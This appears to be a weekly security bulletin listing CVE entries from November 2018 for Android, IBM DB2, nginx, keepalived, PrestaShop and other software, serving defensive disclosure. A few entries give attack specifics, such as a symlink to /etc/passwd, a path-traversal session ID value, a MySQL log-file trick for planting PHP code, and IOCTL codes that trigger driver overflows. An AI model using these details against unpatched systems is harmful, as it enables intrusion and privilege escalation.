    google -- androidWhen wifi is switched, function sendNetworkStateChangeBroadcast of WifiStateMachine.java broadcasts an intent including detailed wifi network information. This could lead to information disclosure with no execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9.0 Android ID: A-77286245.2018-11-06not yet calculatedCVE-2018-9489
    SECTRACK
    MISC
    google -- androidIn process_l2cap_cmd of l2c_main.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-74201143.2018-11-06not yet calculatedCVE-2018-9360
    BID
    CONFIRM
    google -- androidIn bnep_data_ind of bnep_main.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-79164722.2018-11-06not yet calculatedCVE-2018-9436
    SECTRACK
    CONFIRM
    google -- androidIn hid_debug_events_read of drivers/hid/hid-debug.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android kernel Android ID: A-71361580.2018-11-06not yet calculatedCVE-2018-9516
    MLIST
    CONFIRM
    DEBIAN
    google -- androidIn bnep_data_ind of bnep_main.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-78286118.2018-11-06not yet calculatedCVE-2018-9454
    SECTRACK
    CONFIRM
    google -- androidWhen a device connects only over WiFi VPN, the device may not receive security updates due to some incorrect checks. This could lead to a local denial of service of security updates with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android Versions: Android-8.1 Android ID: A-78644887.2018-11-06not yet calculatedCVE-2018-9438
    SECTRACK
    CONFIRM
    google -- androidIn computeFocusedWindow of RootWindowContainer.java, and related functions, there is possible interception of keypresses due to focus being on the wrong window. This could lead to local escalation of privilege revealing the user's keypresses while the screen was locked with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android Versions: Android-8.0 Android-8.1 Android ID: A-71786287.2018-11-06not yet calculatedCVE-2018-9458
    SECTRACK
    CONFIRM
    google -- androidIn avrc_proc_vendor_command of avrc_api.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-79541338.2018-11-06not yet calculatedCVE-2018-9450
    SECTRACK
    CONFIRM
    google -- androidIn DynamicRefTable::load of ResourceTypes.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-79488511.2018-11-06not yet calculatedCVE-2018-9451
    SECTRACK
    CONFIRM
    google -- androidIn avct_bcb_msg_ind of avct_bcb_act.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-8.0 Android-8.1 Android ID: A-79944113.2018-11-06not yet calculatedCVE-2018-9448
    SECTRACK
    CONFIRM
    google -- androidIn avdt_msg_prs_cfg of avdt_msg.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-78288378.2018-11-06not yet calculatedCVE-2018-9453
    SECTRACK
    CONFIRM
    google -- androidIn sdpu_extract_attr_seq of sdp_utils.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-78136677.2018-11-06not yet calculatedCVE-2018-9455
    SECTRACK
    CONFIRM
    google -- androidIn task_get_unused_fd_flags of binder.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android kernel Android ID: A-69164715 References: Upstream kernel.2018-11-06not yet calculatedCVE-2018-9465
    SECTRACK
    CONFIRM
    google -- androidIn Attachment of Attachment.java and getFilePath of EmlAttachmentProvider.java, there is a possible Elevation of Privilege due to a path traversal error. This could lead to a remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-66230183.2018-11-06not yet calculatedCVE-2018-9459
    SECTRACK
    CONFIRM
    google -- androidIn process_l2cap_cmd of l2c_main.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-74202041.2018-11-06not yet calculatedCVE-2018-9361
    BID
    CONFIRM
    google -- androidIn ih264d_video_decode of ih264d_api.c there is a possible resource exhaustion due to an infinite loop. This could lead to remote temporary device denial of service (remote hang or reboot) with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android ID: A-63521984.2018-11-06not yet calculatedCVE-2018-9444
    SECTRACK
    CONFIRM
    google -- androidIn process_l2cap_cmd of l2c_main.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-74196706.2018-11-06not yet calculatedCVE-2018-9359
    BID
    CONFIRM
    google -- androidIn bta_dm_sdp_result of bta_dm_act.cc, there is a possible out of bounds stack write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-74016921.2018-11-06not yet calculatedCVE-2018-9355
    BID
    CONFIRM
    google -- androidIn smp_br_state_machine_event of smp_br_main.cc, there is a possible out of bounds write due to memory corruption. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-6.0 Android-6.0.1 Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android ID: A-80145946.2018-11-06not yet calculatedCVE-2018-9446
    SECTRACK
    CONFIRM
    google -- cardboard_application_for_android_and_iosThe Google Cardboard application 1.8 for Android and 1.2 for iOS sends potentially private cleartext information to the Unity 3D Stats web site, as demonstrated by device make, model, and OS.2018-11-08not yet calculatedCVE-2018-19111
    MISC
    hunan_jinyun_network_technology_co -- pbootcmsPbootCMS 1.2.2 allows remote attackers to execute arbitrary PHP code by specifying a .php filename in a "SET GLOBAL general_log_file" statement, followed by a SELECT statement containing this PHP code.2018-11-07not yet calculatedCVE-2018-19053
    MISC
    i18n_gem_for_ruby_on_rails -- i18n_gem_for_ruby_on_railsHash#slice in lib/i18n/core_ext/hash.rb in the i18n gem before 0.8.0 for Ruby allows remote attackers to cause a denial of service (application crash) via a call in a situation where :some_key is present in keep_keys but not present in the hash.2018-11-06not yet calculatedCVE-2014-10077
    MISC
    MISC
    MISC
    ibm -- api_connectIBM API Connect 5.0.0.0, 5.0.8.4, 2018.1 and 2018.3.6 is vulnerable to CSV injection via the developer portal and analytics that could contain malicious commands that would be executed once opened by an administrator. IBM X-Force ID: 148692.2018-11-08not yet calculatedCVE-2018-1774
    XF
    CONFIRM
    ibm -- campaignIBM Campaign 9.1.0, 9.1.2, 10.0, and 10.1 could allow an authenticated user with access to the local network to bypass security due to lack of input validation. IBM X-Force ID: 120206.2018-11-08not yet calculatedCVE-2016-9749
    CONFIRM
    XF
    ibm -- cognos_analyticsIBM Cognos Analytics 11 Configuration tool, under certain circumstances, will bypass OIDC namespace signature verification on its id_token. IBM X-Force ID: 150902.2018-11-08not yet calculatedCVE-2018-1842
    SECTRACK
    XF
    CONFIRM
    ibm -- db2_for_linux_and_unix_and_windowsIBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 contains a vulnerability that could allow a local user to escalate their privileges to root through a symbolic link attack. IBM X-Force ID: 150511.2018-11-08not yet calculatedCVE-2018-1834
    CONFIRM
    XF
    ibm -- db2_for_linux_and_unix_and_windowsIBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 could allow a local user to obtain root access by exploiting a symbolic link attack to read/write/corrupt a file that they originally did not have permission to access. IBM X-Force ID: 148804.2018-11-08not yet calculatedCVE-2018-1781
    CONFIRM
    XF
    ibm -- db2_for_linux_and_unix_and_windowsIBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 binaries load shared libraries from an untrusted path potentially giving low privilege user full access to the DB2 instance account by loading a malicious shared library. IBM X-Force ID: 149640.2018-11-08not yet calculatedCVE-2018-1802
    CONFIRM
    XF
    ibm -- db2_for_linux_and_unix_and_windowsIBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 could allow a local unprivileged user to overwrite files on the system which could cause damage to the database. IBM X-Force ID: 149429.2018-11-08not yet calculatedCVE-2018-1799
    CONFIRM
    XF
    ibm -- db2_for_linux_and_unix_and_windowsIBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 11.1 could allow a user to bypass FGAC control and gain access to data they shouldn't be able to see. IBM X-Force ID: 151155.2018-11-08not yet calculatedCVE-2018-1857
    CONFIRM
    XF
    ibm -- db2_for_linux_and_unix_and_windowsIBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 could allow a local db2 instance owner to obtain root access by exploiting a symbolic link attack to read/write/corrupt a file that they originally did not have permission to access. IBM X-Force ID: 148803.2018-11-08not yet calculatedCVE-2018-1780
    CONFIRM
    XF
    ibm -- marketing_operationsIBM Marketing Operations 9.1.0, 9.1.2, and 10.1 could allow a remote attacker to obtain sensitive information. An attacker could send a specially-crafted request to cause an error message to be returned containing the full root path. An attacker could use this information to launch further attacks against the affected system. IBM X-Force ID: 121171.2018-11-08not yet calculatedCVE-2017-1119
    CONFIRM
    XF
    ibm -- maximo_asset_managementIBM Maximo Asset Management 7.6 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 151330.2018-11-09not yet calculatedCVE-2018-1872
    XF
    CONFIRM
    ibm -- multiple_productsIBM Jazz applications (IBM Rational Collaborative Lifecycle Management 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational DOORS Next Generation 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational Engineering Lifecycle Manager 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational Quality Manager 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational Rhapsody Design Manager 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational Software Architect Design Manager 5.0 through 5.02 and 6.0 through 6.0.1, IBM Rational Team Concert 5.0 through 5.02 and 6.0 through 6.0.6) could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 145609.2018-11-06not yet calculatedCVE-2018-1694
    CONFIRM
    XF
    ibm -- multiple_productsIBM Jazz based applications (IBM Rational Collaborative Lifecycle Management 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational DOORS Next Generation 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational Engineering Lifecycle Manager 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational Quality Manager 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational Rhapsody Design Manager 5.0 through 5.02 and 6.0 through 6.0.6, IBM Rational Software Architect Design Manager 5.0 through 5.02 and 6.0 through 6.0.1, IBM Rational Team Concert 5.0 through 5.02 and 6.0 through 6.0.6) could allow an authenticated user to obtain sensitive information from an error message that could be used in further attacks against the system. IBM X-Force ID: 143796.2018-11-06not yet calculatedCVE-2018-1606
    CONFIRM
    XF
    ibm -- spectrum_protect_serverIBM Spectrum Protect Server 7.1 and 8.1 could disclose highly sensitive information via trace logs to a local privileged user. IBM X-Force ID: 148873.2018-11-02not yet calculatedCVE-2018-1788
    CONFIRM
    BID
    SECTRACK
    XF
    ibm -- websphere_mqIBM WebSphere MQ 8.0 through 9.1 is vulnerable to a error with MQTT topic string publishing that can cause a denial of service attack. IBM X-Force ID: 145456.2018-11-08not yet calculatedCVE-2018-1684
    XF
    CONFIRM
    international_components_for_unicode -- international_components_for_unicodeInternational Components for Unicode (ICU) for C/C++ 63.1 has an integer overflow in number::impl::DecimalQuantity::toScientificString() in i18n/number_decimalquantity.cpp.2018-11-04not yet calculatedCVE-2018-18928
    MISC
    MISC
    MISC
    iobit -- malware_fighterRegFilter.sys in IOBit Malware Fighter 6.2 is susceptible to a stack-based buffer overflow when an attacker uses IOCTL 0x8006E040 with a size larger than 8 bytes. This can lead to denial of service or code execution with root privileges.2018-11-09not yet calculatedCVE-2018-19086
    MISC
    iobit -- malware_fighterRegFilter.sys in IOBit Malware Fighter 6.2 is susceptible to a stack-based buffer overflow when an attacker uses IOCTL 0x8006E048 with a size larger than 8 bytes. This can lead to denial of service or code execution with root privileges.2018-11-09not yet calculatedCVE-2018-19085
    MISC
    iobit -- malware_fighterRegFilter.sys in IOBit Malware Fighter 6.2 is susceptible to a stack-based buffer overflow when an attacker uses IOCTL 0x8006E05C with a size larger than 8 bytes. This can lead to denial of service or code execution with root privileges.2018-11-09not yet calculatedCVE-2018-19084
    MISC
    iobit -- malware_fighterRegFilter.sys in IOBit Malware Fighter 6.2 is susceptible to a stack-based buffer overflow when an attacker uses IOCTL 0x8006E044 with a size larger than 8 bytes. This can lead to denial of service or code execution with root privileges.2018-11-09not yet calculatedCVE-2018-19087
    MISC
    jasper -- jasperAn issue has been found in JasPer 2.0.14. There is a memory leak in jas_malloc.c when called from jpc_unk_getparms in jpc_cs.c.2018-11-09not yet calculatedCVE-2018-19139
    MISC
    jeecms -- jeecmsJEECMS 9.3 has XSS via an index.do#/content/update?type=update URI.2018-11-05not yet calculatedCVE-2018-18952
    MISC
    jquery -- jqueryUnauthenticated arbitrary file upload vulnerability in jQuery Picture Cut <= v1.1Beta2018-11-05not yet calculatedCVE-2018-9208
    MISC
    keepalived -- keepalivedkeepalived 2.0.8 used mode 0666 when creating new temporary files upon a call to PrintData or PrintStats, potentially leaking sensitive information.2018-11-08not yet calculatedCVE-2018-19045
    MISC
    MISC
    MISC
    MISC
    keepalived -- keepalivedkeepalived 2.0.8 didn't check for pathnames with symlinks when writing data to a temporary file upon a call to PrintData or PrintStats. This allowed local users to overwrite arbitrary files if fs.protected_symlinks is set to 0, as demonstrated by a symlink from /tmp/keepalived.data or /tmp/keepalived.stats to /etc/passwd.2018-11-08not yet calculatedCVE-2018-19044
    MISC
    MISC
    MISC
    keepalived -- keepalived
     
    keepalived 2.0.8 didn't check for existing plain files when writing data to a temporary file upon a call to PrintData or PrintStats. If a local attacker had previously created a file with the expected name (e.g., /tmp/keepalived.data or /tmp/keepalived.stats), with read access for the attacker and write access for the keepalived process, then this potentially leaked sensitive information.2018-11-08not yet calculatedCVE-2018-19046
    MISC
    MISC
    keepalived -- keepalived
     
    keepalived before 2.0.7 has a heap-based buffer overflow when parsing HTTP status codes resulting in DoS or possibly unspecified other impact, because extract_status_code in lib/html.c has no validation of the status code and instead writes an unlimited amount of data to the heap.2018-11-08not yet calculatedCVE-2018-19115
    MISC
    MISC
    MISC
    kindeditor -- kindeditorKindEditor through 4.1.11 has a path traversal vulnerability in php/upload_json.php. Anyone can browse a file or directory in the kindeditor/attached/ folder via the path parameter without authentication.2018-11-05not yet calculatedCVE-2018-18950
    MISC
    knightjs -- knightjsA Path Traversal in Knightjs versions <= 0.0.1 allows an attacker to read content of arbitrary files on a remote server.2018-11-06not yet calculatedCVE-2018-16475
    MISC
    libav -- libavIn Libav 12.3, there is a heap-based buffer over-read in decode_frame in libavcodec/lcldec.c that allows an attacker to cause denial-of-service via a crafted avi file.2018-11-09not yet calculatedCVE-2018-19128
    MISC
    libav -- libavIn Libav 12.3, there is an invalid memory access in vc1_decode_frame in libavcodec/vc1dec.c that allows attackers to cause a denial-of-service via a crafted aac file.2018-11-09not yet calculatedCVE-2018-19130
    MISC
    libav -- libavIn Libav 12.3, a NULL pointer dereference (RIP points to zero) issue in ff_mpa_synth_filter_float in libavcodec/mpegaudiodsp_template.c can cause a segmentation fault (application crash) via a crafted mov file.2018-11-09not yet calculatedCVE-2018-19129
    MISC
    libiec61850 -- libiec61850An issue has been found in libIEC61850 v1.3. It is a NULL pointer dereference in Ethernet_sendPacket in ethernet_bsd.c.2018-11-09not yet calculatedCVE-2018-19122
    MISC
    MISC
    libiec61850 -- libiec61850An issue has been found in libIEC61850 v1.3. It is a NULL pointer dereference in ClientDataSet_getValues in client/ied_connection.c.2018-11-05not yet calculatedCVE-2018-18937
    MISC
    MISC
    libiec61850 -- libiec61850An issue has been found in libIEC61850 v1.3. It is a SEGV in Ethernet_receivePacket in ethernet_bsd.c.2018-11-09not yet calculatedCVE-2018-19121
    MISC
    MISC
    libiec61850 -- libiec61850
     
    An issue has been found in libIEC61850 v1.3. It is a stack-based buffer overflow in prepareGooseBuffer in goose/goose_publisher.c.2018-11-05not yet calculatedCVE-2018-18957
    MISC
    EXPLOIT-DB
    librecad -- librecadLibreCAD 2.1.3 allows remote attackers to cause a denial of service (0x89C04589 write access violation and application crash) or possibly have unspecified other impact via a crafted file.2018-11-08not yet calculatedCVE-2018-19105
    MISC
    light_code_labs -- caddyCaddy through 0.11.0 sends incorrect certificates for certain invalid requests, making it easier for attackers to enumerate hostnames. Specifically, when unable to match a Host header with a vhost in its configuration, it serves the X.509 certificate for a randomly selected vhost in its configuration. Repeated requests (with a nonexistent hostname in the Host header) permit full enumeration of all certificates on the server. This generally permits an attacker to easily and accurately discover the existence of and relationships among hostnames that weren't meant to be public, though this information could likely have been discovered via other methods with additional effort.2018-11-10not yet calculatedCVE-2018-19148
    MISC
    MISC
    MISC
    lighttpd -- lighttpdAn issue was discovered in mod_alias_physical_handler in mod_alias.c in lighttpd before 1.4.50. There is potential ../ path traversal of a single directory above an alias target, with a specific mod_alias configuration where the matched alias lacks a trailing '/' character, but the alias target filesystem path does have a trailing '/' character.2018-11-07not yet calculatedCVE-2018-19052
    MISC
    metinfo -- metinfoMetInfo 6.1.3 has XSS via the admin/index.php?a=dogetpassword abt_type parameter.2018-11-06not yet calculatedCVE-2018-19051
    MISC
    metinfo -- metinfoMetInfo 6.1.3 has XSS via the admin/index.php?a=dogetpassword langset parameter.2018-11-06not yet calculatedCVE-2018-19050
    MISC
    micro_focus -- operations_bridgeA potential remote code execution and information disclosure vulnerability exists in Micro Focus Operations Bridge containerized suite versions 2017.11, 2018.02, 2018.05, 2018.08. This vulnerability could allow for information disclosure.2018-11-07not yet calculatedCVE-2018-18590
    CONFIRM
    mindoc -- mindocAn issue was discovered in MinDoc through v1.0.2. It allows attackers to gain privileges by uploading an image file with contents that represent an admin session, and then sending a Cookie: header with a mindoc_id value containing the relative pathname of this uploaded file. For example, the mindoc_id (aka session ID) could be of the form aa/../../uploads/blog/201811/attach_#.jpg where '#' is a hex value displayed in the upload field of a manage/blogs/edit/ screen.2018-11-08not yet calculatedCVE-2018-19114
    MISC
    nginx - nginxnginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive CPU usage. This issue affects nginx compiled with the ngx_http_v2_module (not compiled by default) if the 'http2' option of the 'listen' directive is used in a configuration file.2018-11-07not yet calculatedCVE-2018-16844
    MISC
    BID
    SECTRACK
    CONFIRM
    UBUNTU
    DEBIAN
    nginx -- nginxnginx before versions 1.15.6, 1.14.1 has a vulnerability in the ngx_http_mp4_module, which might allow an attacker to cause infinite loop in a worker process, cause a worker process crash, or might result in worker process memory disclosure by using a specially crafted mp4 file. The issue only affects nginx if it is built with the ngx_http_mp4_module (the module is not built by default) and the .mp4. directive is used in the configuration file. Further, the attack is only possible if an attacker is able to trigger processing of a specially crafted mp4 file with the ngx_http_mp4_module.2018-11-07not yet calculatedCVE-2018-16845
    MISC
    BID
    SECTRACK
    CONFIRM
    MLIST
    UBUNTU
    DEBIAN
    nginx -- nginxnginx before versions 1.15.6 and 1.14.1 has a vulnerability in the implementation of HTTP/2 that can allow for excessive memory consumption. This issue affects nginx compiled with the ngx_http_v2_module (not compiled by default) if the 'http2' option of the 'listen' directive is used in a configuration file.2018-11-07not yet calculatedCVE-2018-16843
    MISC
    BID
    SECTRACK
    CONFIRM
    UBUNTU
    DEBIAN
    node.js -- node.jsA path traversal in takeapeek module versions <=0.2.2 allows an attacker to list directory and files.2018-11-06not yet calculatedCVE-2018-16473
    MISC
    node.js -- node.jsA stored xss in tianma-static module versions <=1.0.4 allows an attacker to execute arbitrary javascript.2018-11-06not yet calculatedCVE-2018-16474
    MISC
    node.js -- node.jsA prototype pollution attack in cached-path-relative versions <=1.0.1 allows an attacker to inject properties on Object.prototype which are then inherited by all the JS objects through the prototype chain causing a DoS attack.2018-11-06not yet calculatedCVE-2018-16472
    MISC
    omron -- cx-supervisorWhen processing project files in Omron CX-Supervisor versions 3.4.1.0 and prior, the application fails to check if it is referencing freed memory, which may allow an attacker to execute code under the context of the application.2018-11-05not yet calculatedCVE-2018-17909
    BID
    MISC
    omron -- cx-supervisorWhen processing project files in Omron CX-Supervisor versions 3.4.1.0 and prior and tampering with the value of an offset, an attacker can force the application to read a value outside of an array.2018-11-05not yet calculatedCVE-2018-17907
    BID
    MISC
    omron -- cx-supervisorA type confusion vulnerability exists when processing project files in Omron CX-Supervisor versions 3.4.1.0 and prior, which may allow an attacker to execute code in the context of the application.2018-11-05not yet calculatedCVE-2018-17913
    BID
    MISC
    omron -- cx-supervisorWhen processing project files in Omron CX-Supervisor versions 3.4.1.0 and prior and tampering with a specific byte, memory corruption may occur within a specific object.2018-11-05not yet calculatedCVE-2018-17905
    BID
    MISC
    open_information _security _foundation -- suricataThe ProcessMimeEntity function in util-decode-mime.c in Suricata 4.x before 4.0.6 allows remote attackers to cause a denial of service (segfault and daemon crash) via crafted input to the SMTP parser, as exploited in the wild in November 2018.2018-11-05not yet calculatedCVE-2018-18956
    CONFIRM
    MISC
    MISC
    oscommerce -- oscommerceosCommerce 2.3.4.1 has an incomplete '.htaccess' for blacklist filtering in the "product" page. The .htaccess file in catalog/images/ bans the html extension, but there are several extensions in which contained HTML can be executed, such as the svg extension.2018-11-05not yet calculatedCVE-2018-18964
    MISC
    oscommerce -- oscommerceosCommerce 2.3.4.1 has an incomplete '.htaccess' for blacklist filtering in the "product" page. The .htaccess file in catalog/images/ bans the html extension, but Internet Explorer render HTML elements in a .eml file.2018-11-05not yet calculatedCVE-2018-18966
    MISC
    oscommerce -- oscommerceosCommerce 2.3.4.1 has an incomplete '.htaccess' for blacklist filtering in the "product" page. The .htaccess file in catalog/images/ bans the html extension, but there are several alternative cases in which HTML can be executed, such as a file with no extension or an unrecognized extension (e.g., the test or test.asdf filename).2018-11-05not yet calculatedCVE-2018-18965
    MISC
    pandao -- editor.mdpandao Editor.md 1.5.0 has DOM XSS via input starting with a "<<" substring, which is mishandled during construction of an A element.2018-11-07not yet calculatedCVE-2018-19056
    MISC
    pdfforge -- pdf_architectMemory corruption in PDMODELProvidePDModelHFT in pdmodel.dll in pdfforge PDF Architect 6 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact because of a "Data from Faulting Address controls Code Flow" issue.2018-11-10not yet calculatedCVE-2018-19150
    MISC
    MISC
    pluralsight-- javascriptA malicious user with enough administration entitlements can inject html-like elements containing JavaScript statements into Connector names, Report names, AnyTypeClass keys and Policy descriptions. When another user with enough administration entitlements edits one of the Entities above via Admin Console, the injected JavaScript code is executed.2018-11-06not yet calculatedCVE-2018-17184
    MISC
    popojicms -- popojicmisAn issue was discovered in PopojiCMS v2.0.1. It has CSRF via the po-admin/route.php?mod=component&act=addnew URI, as demonstrated by adding a level=1 account.2018-11-05not yet calculatedCVE-2018-18935
    MISC
    popojicms -- popojicmsAn issue was discovered in PopojiCMS v2.0.1. admin_component.php is exploitable via the po-admin/route.php?mod=component&act=addnew URI by using the fupload parameter to upload a ZIP file containing arbitrary PHP code (that is extracted and can be executed). This can also be exploited via CSRF.2018-11-05not yet calculatedCVE-2018-18934
    MISC
    MISC
    popojicms -- popojicmsAn issue was discovered in PopojiCMS v2.0.1. admin_library.php allows remote attackers to delete arbitrary files via directory traversal in the po-admin/route.php?mod=library&act=delete id parameter.2018-11-05not yet calculatedCVE-2018-18936
    MISC
    poppler -- popplerAn issue was discovered in Poppler 0.71.0. There is a NULL pointer dereference in goo/GooString.h, will lead to denial of service, as demonstrated by utils/pdfdetach.cc not validating a filename of an embedded file before constructing a save path.2018-11-07not yet calculatedCVE-2018-19060
    MISC
    poppler -- popplerAn issue was discovered in Poppler 0.71.0. There is a out-of-bounds read in EmbFile::save2 in FileSpec.cc, will lead to denial of service, as demonstrated by utils/pdfdetach.cc not validating embedded files before save attempts.2018-11-07not yet calculatedCVE-2018-19059
    MISC
    poppler -- popplerPoppler before 0.70.0 has a NULL pointer dereference in _poppler_attachment_new when called from poppler_annot_file_attachment_get_attachment.2018-11-10not yet calculatedCVE-2018-19149
    MISC
    poppler -- popplerAn issue was discovered in Poppler 0.71.0. There is a reachable abort in Object.h, will lead to denial of service because EmbFile::save2 in FileSpec.cc lacks a stream check before saving an embedded file.2018-11-07not yet calculatedCVE-2018-19058
    MISC
    powerdns -- recursorAn issue has been found in PowerDNS Recursor from 4.0.0 up to and including 4.1.4. A remote attacker sending a DNS query for a meta-type like OPT can lead to a zone being wrongly cached as failing DNSSEC validation. It only arises if the parent zone is signed, and all the authoritative servers for that parent zone answer with FORMERR to a query for at least one of the meta-types. As a result, subsequent queries from clients requesting DNSSEC validation will be answered with a ServFail.2018-11-09not yet calculatedCVE-2018-14644
    CONFIRM
    CONFIRM
    prestashop -- prestashopPrestaShop 1.6.x before 1.6.1.23 and 1.7.x before 1.7.4.4 allows remote attackers to execute arbitrary code via a file upload.2018-11-09not yet calculatedCVE-2018-19126
    MISC
    MISC
    MISC
    prestashop -- prestashopPrestaShop 1.6.x before 1.6.1.23 and 1.7.x before 1.7.4.4 on Windows allows remote attackers to write to arbitrary image files.2018-11-09not yet calculatedCVE-2018-19124
    MISC
    MISC
    MISC
    prestashop -- prestashopPrestaShop 1.6.x before 1.6.1.23 and 1.7.x before 1.7.4.4 allows remote attackers to delete an image directory.2018-11-09not yet calculatedCVE-2018-19125
    MISC
    MISC
    MISC
    projeqtor -- projeqtorThe image-upload feature in ProjeQtOr 7.2.5 allows remote attackers to execute arbitrary code by uploading a .shtml file with "#exec cmd" because rejected files remain on the server, with predictable filenames, after a "This file is not a valid image" error message.2018-11-04not yet calculatedCVE-2018-18924
    MISC
    EXPLOIT-DB
    publiccms -- publiccmsAn issue was discovered in PublicCMS V4.0. It allows XSS by modifying the page_list "attached" attribute (which typically has 'class="icon-globe icon-large"' in its value), as demonstrated by an 'UPDATE sys_module SET attached = "[XSS]" WHERE id="page_list"' statement.2018-11-04not yet calculatedCVE-2018-18927
    MISC
    qemu -- qemuAn OOB heap buffer r/w access issue was found in the NVM Express Controller emulation in QEMU. It could occur in nvme_cmb_ops routines in nvme device. A guest user/process could use this flaw to crash the QEMU process resulting in DoS or potentially run arbitrary code with privileges of the QEMU process.2018-11-02not yet calculatedCVE-2018-16847
    BID
    CONFIRM
    MISC
    MLIST
    richfaces -- richfacesThe RichFaces Framework 3.X through 3.3.4 is vulnerable to Expression Language (EL) injection via the UserResource resource. A remote, unauthenticated attacker could exploit this to execute arbitrary code using a chain of java serialized objects via org.ajax4jsf.resource.UserResource$UriData.2018-11-06not yet calculatedCVE-2018-14667
    SECTRACK
    REDHAT
    REDHAT
    REDHAT
    CONFIRM
    s-cms -- s-cmsAn issue was discovered in S-CMS v1.5. There is an XSS vulnerability in search.php via the keyword parameter.2018-11-09not yet calculatedCVE-2018-19145
    MISC
    sauter -- case_suiteAn XXE vulnerability exists in CASE Suite Versions 3.10 and prior when processing parameter entities, which may allow remote file disclosure.2018-11-02not yet calculatedCVE-2018-17912
    BID
    MISC
    sennheiser -- headsetupSennheiser HeadSetup 7.3.4903 places Certification Authority (CA) certificates into the Trusted Root CA store of the local system, and publishes the private key in the SennComCCKey.pem file within the public software distribution, which allows remote attackers to spoof arbitrary web sites or software publishers for several years, even if the HeadSetup product is uninstalled. NOTE: a vulnerability-assessment approach must check all Windows systems for CA certificates with a CN of 127.0.0.1 or SennComRootCA, and determine whether those certificates are unwanted.2018-11-09not yet calculatedCVE-2018-17612
    MISC
